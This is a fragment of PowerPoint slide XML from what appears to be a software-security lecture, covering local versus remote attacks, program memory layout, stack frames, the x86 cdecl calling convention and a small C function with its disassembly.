              </a:rPr>
              <a:t>] = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] + 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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136316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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>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51375" y="186318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478779" y="5313696"/>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478779" y="5704802"/>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4560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2" grpId="0"/>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vs. Local Attacks </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smtClean="0"/>
              <a:t>Local attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow one to manipulate the behavior of an application through local interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Require a previously-established presence on the host (e.g., an account, or another application under the control of the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow one to execute operations with privileges that are different (usually superior) from the ones that the attacker would otherwise have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In general these attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>re easier to perform, because the attacker has a better knowledge of the environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through network-based interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthenticated remote attacks: Interaction with the application does not require authentication or prior capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with the privileges of the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In general, are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>more difficult to perform but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>do not require prior access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116257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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>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6776" y="213575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1181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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>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51375" y="213575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41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82</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4101" y="240796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88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83</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4101" y="240796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5159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9942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84</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6739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606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85</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6739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2496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86</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97222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8949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87</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0x41273333</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97222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295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88</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0x41273333</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23671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3949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0x41273333</a:t>
                      </a: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89</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0x41273333</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23671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94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Life of an Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Author writes code in high-level language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application is translated in some executable form and saved to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interpretation vs. compilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application is loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application terminates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160119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0x41273333</a:t>
                      </a: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90</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0x41273333</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7" y="35057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c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41762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0x41273333</a:t>
                      </a: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91</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7" y="35057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c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="205159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2212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0x41273333</a:t>
                      </a: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92</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78619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c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>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208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0x41273333</a:t>
                      </a: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0x6E</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93</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78619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c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>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5065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0x41273333</a:t>
                      </a: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0x6E</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94</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9550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c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>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2119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Allows us to allocate memory for the function's local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, when considering calling a function, what other information do we need?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return address (where to start program execution when function returns)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary variables</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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60713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Calling Convention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of the previous information must be stored on the stack in order to call the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Who should store that information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Caller?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thus, we need to define a convention of who pushes/stores what values on the stack to call a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Varies based on processor, operating system, compiler, or type of call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148394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x86 Linux Calling Convention (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cdecl</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Caller (in this order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pushes arguments onto the stack (in right to left order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pushes address of instruction after call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pushes previous frame pointer onto stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creates space on stack for local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensures that stack is consistent on return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return value in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194995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4" y="305134"/>
            <a:ext cx="4229810" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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return</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 + b + 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(10, 40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763"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2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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push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esp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0xc(</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0x8(</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edx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lea (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,1),</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add $0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</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pop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ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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push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esp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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
